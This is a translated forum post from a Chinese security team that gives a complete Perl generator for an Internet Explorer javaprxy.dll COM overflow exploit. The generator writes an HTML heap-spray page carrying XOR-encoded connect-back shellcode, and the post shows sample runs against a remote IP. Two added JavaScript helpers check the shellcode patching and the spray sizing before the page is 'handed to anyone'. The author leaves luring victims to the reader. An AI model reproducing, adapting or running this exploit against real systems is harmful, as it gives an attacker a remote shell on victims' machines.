Notes on Rewriting the IE javaprxy.dll COM Object Exploit


Source: Evil Octal Security Team (邪恶八进制信息安全团队)

The Microsoft Internet Explorer javaprxy.dll COM Object overflow vulnerability was published just a couple of days ago; I have posted a similar one before. I won't go into the principle behind the vulnerability; in short, it is yet another hole in IE. The exploit still takes the brute-force approach of filling up memory (a heap spray); my changes here are mainly to the shellcode.
A shellcode that listens locally is not of much use; a connect-back one is far more comfortable. Changing the shellcode is not quite that simple, though: the payload is delivered as %u-escaped Unicode text and then run through its own XOR decoder, so a new address has to be written in pre-XORed with the decoder key (0x99) if it is to survive both steps. That is the small trick used below.

The whole program is written out below, entirely in Perl:

#! /usr/bin/perl
#doomie.pl

use strict;
use Socket;

# Connect-back shellcode: a 23-byte XOR decoder stub (jmp/call/pop, then
# "xor byte [ebx+ecx],0x99" over 0x125 bytes) followed by the encoded body,
# which was generated for 127.0.0.1:1234 and is patched below.
my $reverse_shell="\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA".
  "\xEB\x05\xE8\xEB\xFF\xFF\xFF".
  "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12".
  "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99".
  "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12".
  "\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99".
  "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9".
  "\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D".
  "\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA".
  "\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32".
  "\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10".
  "\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8".
  "\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66".
  "\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5".
  "\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8".
  "\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A".
  "\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12".
  "\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A".
  "\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C".
  "\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33".
  "\xF9\x7E\xE0\x5F\xE0";

my $shellcode_text;
print "\tMicrosoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n\n";
print "\t\t connect back shell rewritten by 无敌最寂寞[EST]\n\n";
print "Usage:\n\tdoomie.pl <connect-back-ip> <connect-back-port> [destination file]\n\n";
print "Attention:if [destination file] is omitted,superlone.html will be default!\n\n";
my $ip=shift || die "[-]ERROR! connect back ip must be specified!\n";
my $port=shift || die "[-]ERROR!connect back port must be specified!\n";
my $file=shift || "superlone.html";
print "[+]Generating Shellcode ......";
# The decoder stub XORs every byte of the encoded body with 0x99 before it
# runs, so the address is stored pre-XORed and decodes to the real
# inet_aton()/htons() values.
$ip=inet_aton($ip) || die "[-]ERROR! invalid connect back ip!\n";
$ip=$ip^(pack "L",0x99999999);
$port=(pack "n",$port)^(pack "S",0x9999);
# Offset 118 holds sin_port (2 bytes) and offset 111 sin_addr (4 bytes) in
# the encoded body, where the original payload kept 127.0.0.1:1234.
substr($reverse_shell,118,2)=$port;
substr($reverse_shell,111,4)=$ip;

#open(FILE,">temp");
#binmode(FILE);
#print FILE $reverse_shell;
#close(FILE);
# Split the shellcode into two-byte little-endian units and emit each as
# %uXXXX, the form unescape() turns back into the original bytes. The loop
# pairs bytes (i-1, i); a trailing odd byte is padded with a NOP (0x90) so it
# is not silently dropped (this payload is 316 bytes, so no padding occurs).
$reverse_shell.="\x90" if length($reverse_shell) % 2;
my $len=length($reverse_shell);
my @temp;
my $i=0;
while($i<$len){
$temp[$i]=sprintf("%.2x",ord(substr($reverse_shell,$i,1)));
$i++;
}
$i=0;

while($i<$len)
{
if($i % 2!=0)
{
$shellcode_text.="%u".$temp[$i].$temp[$i-1];
}
$i++;
}
print "DONE\n";
print "[+]Creating exploitable file ......";
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";
# "%u4343%u4343" puts four 0x43 bytes (inc ebx) in front of the shellcode:
# harmless padding that the 0x0D sled can run into at any alignment.
my $jedi="shellcode = unescape(\"%u4343\"+\"%u4343\"+\"$shellcode_text\");\n";
# Memory: heap spray. Grow a block of 0x0D0D bytes until block + shellcode +
# a 20-character header allowance reaches 0x40000 characters (0x80000 bytes),
# then keep 750 copies of block+shellcode alive so that 0x0D0D0D0D is covered.
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize+shellcode.length;\n".
"while (bigblock.length<slackspace) bigblock+=bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length+slackspace<0x40000) block = block+block+fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i++) memory[i] = block + shellcode;\n".
"</SCRIPT>\n";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < [url]http://www.frsirt.com[/url] >\n".
"reverse shellcode by 无敌最寂寞[EST]\n".
"Solution - [url]http://www.frsirt.com/english/advisories/2005/0935[/url]".
"</body><script>location.reload();</script></html>";

open(FILE,">$file") || die "[+]ERROR!open file failed!\n";
print FILE "$header $jedi $code $footer";
close FILE;
print "DONE\n\n";
print "CHECK if it does WORK!\n";
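The part of the script that is easy to get wrong is the patching: the IP and port have to be written into the encoded body already XORed with the decoder key, and the bytes then have to survive the %u escaping and `unescape()` on the victim side. The following is an added example, not code from the original post, that models that pipeline in JavaScript (the language the spray page itself runs in) and checks the result the way the browser would see it. The 23-byte decoder stub is copied from the shellcode above; the encoded body is constructed filler with only the two address fields at the post's offsets (111 and 118), and the odd-length NOP padding is this example's own addition, not something doomie.pl does.

```javascript
// Added example, not code from the original post. It models what doomie.pl
// does to the shellcode (patch IP/port pre-XORed with the decoder key, emit
// %uXXXX units) and then checks the result the way the victim browser sees
// it: unescape() the text, run a software model of the decoder stub, and read
// the socket address back out.

const XOR_KEY = 0x99;      // key used by the stub's "xor byte [ebx+ecx], 0x99"
const BODY_LEN = 0x125;    // byte count loaded by the stub's "mov cx, 0x125"
const IP_OFFSET = 111;     // sin_addr (4 bytes, inet_aton order) in the body
const PORT_OFFSET = 118;   // sin_port (2 bytes, network order) in the body

// The 23-byte decoder prologue, byte for byte as in the post's shellcode.
// Bytes 8-9 are the count, byte 13 is the key; everything else is fixed.
const STUB = [
  0xEB, 0x10, 0x5B, 0x4B, 0x33, 0xC9, 0x66, 0xB9, 0x25, 0x01,
  0x80, 0x34, 0x0B, 0x99, 0xE2, 0xFA, 0xEB, 0x05, 0xE8, 0xEB,
  0xFF, 0xFF, 0xFF,
];
const STUB_VARIABLE = new Set([8, 9, 13]);

// Constructed sample: real prologue, body of 0x99 filler (decodes to 0x00),
// with 127.0.0.1:1234 encoded at the field offsets like the unpatched
// payload in the post (E6 99 99 98 and 9D 4B on the wire).
function buildSampleShellcode() {
  const sc = Uint8Array.from(STUB.concat(new Array(BODY_LEN).fill(XOR_KEY)));
  [0x7F, 0x00, 0x00, 0x01].forEach((b, i) => { sc[IP_OFFSET + i] = b ^ XOR_KEY; });
  [0x04, 0xD2].forEach((b, i) => { sc[PORT_OFFSET + i] = b ^ XOR_KEY; });
  return sc;
}

// Write a new connect-back address. The decoder XORs every body byte with the
// key before the code runs, so the stored bytes are value ^ key, exactly what
// doomie.pl gets from pack("L",0x99999999) and pack("S",0x9999).
function patchConnectBack(shellcode, ip, port, key = XOR_KEY) {
  const parts = ip.split(".");
  if (parts.length !== 4 || parts.some((p) => !/^\d{1,3}$/.test(p) || Number(p) > 255)) {
    throw new Error("bad IPv4 address: " + ip);
  }
  if (!Number.isInteger(port) || port < 1 || port > 65535) {
    throw new Error("bad port: " + port);
  }
  const out = Uint8Array.from(shellcode);
  parts.map(Number).forEach((o, i) => { out[IP_OFFSET + i] = o ^ key; }); // inet_aton order
  out[PORT_OFFSET] = (port >> 8) ^ key;                                     // htons: high byte first
  out[PORT_OFFSET + 1] = (port & 0xFF) ^ key;
  return out;
}

// Emit "%uXXXX" units. unescape() turns each into one UTF-16 code unit, which
// sits in memory as two little-endian bytes, so the first byte of a pair goes
// in the LAST two hex digits: bytes 41 42 -> "%u4241". doomie.pl silently
// drops a trailing odd byte; this version pads with a NOP (0x90) instead.
function toUnicodeEscape(bytes) {
  const b = Array.from(bytes);
  if (b.length % 2) b.push(0x90);
  const hex = (n) => n.toString(16).padStart(2, "0");
  let s = "";
  for (let i = 0; i < b.length; i += 2) s += "%u" + hex(b[i + 1]) + hex(b[i]);
  return s;
}

// What unescape() leaves in memory: each code unit back to its two bytes.
function unescapeToBytes(text) {
  const s = unescape(text);
  const out = new Uint8Array(s.length * 2);
  for (let i = 0; i < s.length; i++) {
    const cu = s.charCodeAt(i);
    out[2 * i] = cu & 0xFF;
    out[2 * i + 1] = cu >> 8;
  }
  return out;
}

// Software model of the stub: pop ebx leaves ebx = offset 23, dec ebx, then
// ecx runs count..1, so bytes [23, 23+count) are XORed with the key.
function xorDecode(bytes) {
  const b = Uint8Array.from(bytes);
  const isStub = b.length >= STUB.length &&
    STUB.every((v, i) => STUB_VARIABLE.has(i) || b[i] === v);
  if (!isStub) throw new Error("not the expected XOR decoder stub");
  const count = b[8] | (b[9] << 8);
  const key = b[13];
  if (STUB.length + count > b.length) throw new Error("count field exceeds buffer");
  for (let i = 0; i < count; i++) b[STUB.length + i] ^= key;
  return b;
}

// Read the sockaddr fields out of a decoded image.
function readConnectBack(decoded) {
  const ip = Array.from(decoded.slice(IP_OFFSET, IP_OFFSET + 4)).join(".");
  const port = (decoded[PORT_OFFSET] << 8) | decoded[PORT_OFFSET + 1];
  return { ip, port };
}

// Full pipeline: patch, escape as the script does, then decode as the browser would.
function roundTrip(ip, port) {
  const text = toUnicodeEscape(patchConnectBack(buildSampleShellcode(), ip, port));
  return readConnectBack(xorDecode(unescapeToBytes(text)));
}

console.log(readConnectBack(xorDecode(buildSampleShellcode())));  // { ip: '127.0.0.1', port: 1234 }
console.log(roundTrip("192.168.1.10", 1314));                     // { ip: '192.168.1.10', port: 1314 }
```

Run it with node: the unpatched sample reads back as 127.0.0.1:1234 and the patched one as 192.168.1.10:1314. The same `xorDecode`/`readConnectBack` pair can be pointed at the real 316-byte payload from the script to confirm the offsets before the HTML is handed to anyone.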


The program's usage message is as follows:

H:\temp>doomie.pl
  Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

  connect back shell rewritten by 无敌最寂寞[EST]

Usage:
  doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[-]ERROR! connect back ip must be specified!


The first two arguments need no explanation; the last one is the name of the file to generate, for example dest.html. If it is omitted, the default file name is superlone.html.

Now let's actually generate one and see:

H:\temp>doomie.pl 222.133.151.197 1314
  Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit

  connect back shell rewritten by 无敌最寂寞[EST]

Usage:
  doomie.pl <connect-back-ip> <connect-back-port> [destination file]

Attention:if [destination file] is omitted,superlone.html will be default!

[+]Generating Shellcode ......DONE
[+]Creating exploitable file ......DONE

CHECK if it does WORK!


This produces a file with the default name superlone.html in the same directory as the script.
Open it in IE and it triggers the overflow; if you are lucky enough, go and check your nc listener to see whether you got a shell.
As for how to get the target machine to open it, that is your business and none of mine!
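Whether the victim gets that far depends partly on memory: the spray in the generated page builds 750 strings of 0x0D0D bytes with the shellcode at the end of each, so that a dereference through 0x0D0D0D0D lands in a run of 0x0D bytes (`or eax, imm32` as x86 code) and slides into the shellcode. The following added example, not code from the original post, repeats the page's own sizing arithmetic (bigblock doubling, slackspace, the 0x40000 cut-off, 750 copies) in JavaScript without allocating anything, so the size of each copy and the total can be checked before the page is used. Sizes are in UTF-16 code units, 2 bytes each, which is how IE stores JScript strings; the `headersize = 20` allowance is the script's own assumption, not something this example verifies.

```javascript
// Added example, not code from the original post: the heap-spray sizing from
// the generated HTML, replayed on integers instead of strings.
// All lengths are UTF-16 code units (2 bytes each in IE's JScript strings).

function sprayGeometry({ shellcodeChars, headerSize = 20, limit = 0x40000, copies = 750 }) {
  const slackspace = headerSize + shellcodeChars;

  // bigblock = unescape("%u0D0D%u0D0D") is 2 units; doubled until >= slackspace
  let bigblock = 2;
  while (bigblock < slackspace) bigblock *= 2;

  // fillblock = first slackspace units; block = the remainder of bigblock;
  // then block = block + block + fillblock until block + slackspace >= limit
  let block = bigblock - slackspace;
  let rounds = 0;
  while (block + slackspace < limit) {
    block = block * 2 + slackspace;
    rounds++;
  }

  const copyChars = block + shellcodeChars;   // memory[i] = block + shellcode
  const copyBytes = copyChars * 2;
  return {
    slackspace,
    bigblock,
    rounds,
    blockChars: block,
    copyChars,
    copyBytes,
    totalBytes: copyBytes * copies,
    totalMiB: Math.round((copyBytes * copies) / (1024 * 1024)),
  };
}

// The post's payload: "%u4343%u4343" (2 units) + 316 bytes of shellcode (158 units).
const postLayout = sprayGeometry({ shellcodeChars: 2 + 316 / 2 });
console.log(postLayout);
// blockChars 261964, copyChars 262124 (= 0x40000 - 20), about 375 MiB in total
```

Because bigblock is a power of two and each round doubles `block + slackspace`, every copy ends up exactly `limit - headerSize` units long regardless of shellcode size, which is the point of the `slackspace` bookkeeping. The total, roughly 375 MiB for 750 copies, is the amount of memory the victim's IE has to commit before the spray completes.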

Below is a screenshot from my test against a remote machine; here I want to thank xyzreg from the forum for helping with the testing:


During testing I found a few more errors, all of which have now been fixed. Please copy the code above again or download the archive below!

Thanks again to xyzreg for helping with the testing!

